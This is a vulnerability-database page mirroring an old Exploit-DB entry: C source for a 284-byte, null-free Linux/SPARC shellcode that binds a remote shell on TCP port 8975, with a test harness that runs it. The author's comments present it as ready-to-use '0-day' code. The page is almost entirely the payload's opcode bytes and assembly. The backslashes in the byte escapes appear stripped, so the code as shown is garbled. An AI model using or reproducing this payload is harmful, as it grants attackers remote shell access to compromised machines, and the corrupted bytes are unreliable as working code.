Linux/SPARC – Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)

Linux/SPARC – Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)

漏洞ID 1054613 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-Linux/SPARC – Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/SPARC – Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_SPARC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13306
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * 0-day portbind shellcode for all those Sun machines running linux..
 * Coded from scratch, so i take all the credits.
 * It simply binds a pretty shell in port 8975/tcp enjoy.
 * no nulls, no fork, no shit, couldn't be more optimized.
 * enjoy!.
 *
 * Arch   : Sparc
 * OS     : Linux
 * Task   : Portbind
 * Length : 284 Bytes
 *
 * Copyright 2002 killah @ hack . gr
 * All rights reserved.
 *
 */

#define NAME "Sparc Linux Portbind"

char portbind[]=
  "x9dxe3xbfx78"	//	save  %sp, -136, %sp
  "x90x10x20x02"	//	mov  2, %o0
  "x92x10x20x01"	//	mov  1, %o1
  "x94x22x80x0a"	//	sub  %o2, %o2, %o2
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"	//	st  %o2, [ %sp + 0x4c ]
  "x90x10x20x01"	//	mov  1, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x27xbfxf4"	//	st  %o0, [ %fp + -12 ]
  "x90x10x20x02"	//	mov  2, %o0
  "xd0x37xbfxd8"	//	sth  %o0, [ %fp + -40 ]
  "x13x08xc8xc8"	//	sethi  %hi(0x23232000), %o1
  "x90x12x63x0f"	//	or  %o1, 0x30f, %o0
  "xd0x37xbfxda"	//	sth  %o0, [ %fp + -38 ]
  "xc0x27xbfxdc"	//	clr  [ %fp + -36 ]
  "x92x07xbfxd8"	//	add  %fp, -40, %o1
  "xd0x07xbfxf4"	//	ld  [ %fp + -12 ], %o0
  "x94x10x20x10"	//	mov  0x10, %o2
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"	//	st  %o2, [ %sp + 0x4c ]
  "x90x10x20x02"	//	mov  2, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x07xbfxf4"	//	ld  [ %fp + -12 ], %o0
  "x92x10x20x05"	//	mov  5, %o1
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "x90x10x20x04"	//	mov  4, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10
  "x92x07xbfxd8"	//	add  %fp, -40, %o1
  "x94x07xbfxec"	//	add  %fp, -20, %o2
  "xd0x07xbfxf4"	//	ld  [ %fp + -12 ], %o0
  "xd0x23xa0x44"	//	st  %o0, [ %sp + 0x44 ]
  "xd2x23xa0x48"	//	st  %o1, [ %sp + 0x48 ]
  "xd4x23xa0x4c"	//	st  %o2, [ %sp + 0x4c ]
  "x90x10x20x05"	//	mov  5, %o0
  "x92x03xa0x44"	//	add  %sp, 0x44, %o1
  "x82x10x20xce"	//	mov  0xce, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x27xbfxf0"	//	st  %o0, [ %fp + -16 ]
  "xd0x07xbfxf0"	//	ld  [ %fp + -16 ], %o0
  "x92x22x40x09"	//	sub  %o1, %o1, %o1
  "x82x10x20x5a"	//	mov  0x5a, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x07xbfxf0"	//	ld  [ %fp + -16 ], %o0
  "x92x10x20x01"	//	mov  1, %o1
  "x82x10x20x5a"	//	mov  0x5a, %g1
  "x91xd0x20x10"	//	ta  0x10
  "xd0x07xbfxf0"	//	ld  [ %fp + -16 ], %o0
  "x92x10x20x02"	//	mov  2, %o1
  "x82x10x20x5a"	//	mov  0x5a, %g1
  "x91xd0x20x10"	//	ta  0x10
  "x2dx0bxd8x9a"	//	sethi  %hi(0x2f626800), %l6
  "xacx15xa1x6e"	//	or  %l6, 0x16e, %l6
  "x2fx0bxdcxda"	//	sethi  %hi(0x2f736800), %l7
  "x90x0bx80x0e"	//	and  %sp, %sp, %o0
  "x92x03xa0x08"	//	add  %sp, 8, %o1
  "x94x22x80x0a"	//	sub  %o2, %o2, %o2
  "x9cx03xa0x10"	//	add  %sp, 0x10, %sp
  "xecx3bxbfxf0"	//	std  %l6, [ %sp + -16 ]
  "xd0x23xbfxf8"	//	st  %o0, [ %sp + -8 ]
  "xc0x23xbfxfc"	//	clr  [ %sp + -4 ]
  "x82x10x20x3b"	//	mov  0x3b, %g1
  "x91xd0x20x10";	//	ta  0x10

int
main() // test that techno-devil!
{
  int (*funct)();
  funct = (int (*)()) portbind;
  printf("%s shellcodentSize = %dn",NAME,strlen(portbind));
  (int)(*funct)();
  exit(0);
}


/* EOF */

// milw0rm.com [2004-09-12]

相关推荐: Oracle Database 9i SQL Command Buffer Overflow Vulnerability

Oracle Database 9i SQL Command Buffer Overflow Vulnerability 漏洞ID 1097973 漏洞类型 Boundary Condition Error 发布时间 2004-09-07 更新时间 2004-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享